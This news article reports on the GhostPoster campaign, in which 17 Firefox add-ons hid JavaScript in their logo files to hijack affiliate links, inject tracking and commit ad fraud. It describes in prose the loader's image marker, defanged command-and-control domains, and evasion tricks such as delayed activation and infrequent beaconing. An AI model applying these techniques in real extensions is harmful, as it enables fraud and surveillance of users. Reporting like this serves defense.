- A campaign named GhostPoster used malicious logo files in 17 Mozilla Firefox add-ons to deliver Malware targeting over 50,000 users.
- The malware hijacks affiliate links, injects tracking codes, removes browser security headers, and commits ad and click fraud.
- The attack uses a multi-stage loader that fetches payloads with low frequency and delays activation to avoid detection.
- The affected add-ons were falsely promoted as VPNs, ad blockers, translators, and utilities but are now removed.
A campaign known as GhostPoster exploited logo files in 17 Mozilla Firefox browser extensions to embed malicious JavaScript that hijacks affiliate links, injects tracking identifiers, and carries out ad and click fraud. This campaign was active through extensions collectively downloaded more than 50,000 times before their removal, according to findings shared by Koi Security.
These add-ons were presented as VPN services, screenshot tools, ad blockers, and unofficial Google Translate versions. The earliest add-on, named Dark Mode, was published in late October 2024. The list includes popular categories such as Free VPN, Screenshot, Weather, Mouse Gesture, and multiple Google Translate variants.
The malicious operation begins when the browser loads an extension’s logo file. The embedded code searches for a specific marker (“===”) within the image to extract and execute JavaScript. This loader contacts external domains like “www.liveupdt[.]com” or “www.dealctr[.]com” to retrieve a main payload. It waits 48 hours between requests and activates only 10% of the time to reduce the chance of detection.
This payload performs several harmful actions: it hijacks affiliate links to e-commerce sites like Taobao and JD.com, removing commissions from legitimate partners; inserts Google Analytics tracking code into visited pages; strips security headers like Content-Security-Policy and X-Frame-Options that protect against clickjacking and cross-site scripting attacks; and invisibly injects iframes to facilitate ad and click fraud. It also uses CAPTCHA bypass techniques to evade bot detection mechanisms while executing these operations.
“What they actually deliver is a multi-stage malware payload that monitors everything you browse, strips away your browser’s security protections, and opens a backdoor for remote code execution,” stated security researchers Lotan Sery and Noga Gouldman.
Additionally, the malware delays activation for over six days after installation, broadening its stealthiness. Although not every extension used the exact same method, all communicated with the same command-and-control infrastructure, indicating a single threat actor employing multiple tactics.
This discovery follows recent exposures of other malicious VPN extensions harvesting user data, including AI conversations and system information. Koi Security emphasized that free VPN promises often conceal surveillance functions rather than privacy protection.
✅ Follow BITNEWSBOT on Telegram, Facebook, LinkedIn, X.com, and Google News for instant updates.
Previous Articles:
- Solana Dips Below $120: A Potential Buying Opportunity Ahead
- Saylor: Quantum Computing Will Strengthen Bitcoin, Cut Supply
- Bhutan Pledges $1B in Bitcoin for Gelephu Mindfulness City Development
- UK Inflation Drops to 3.2% in November, Lowest in 8 Months
- Clore.ai Burns 300M Tokens in Major Tokenomics Shift
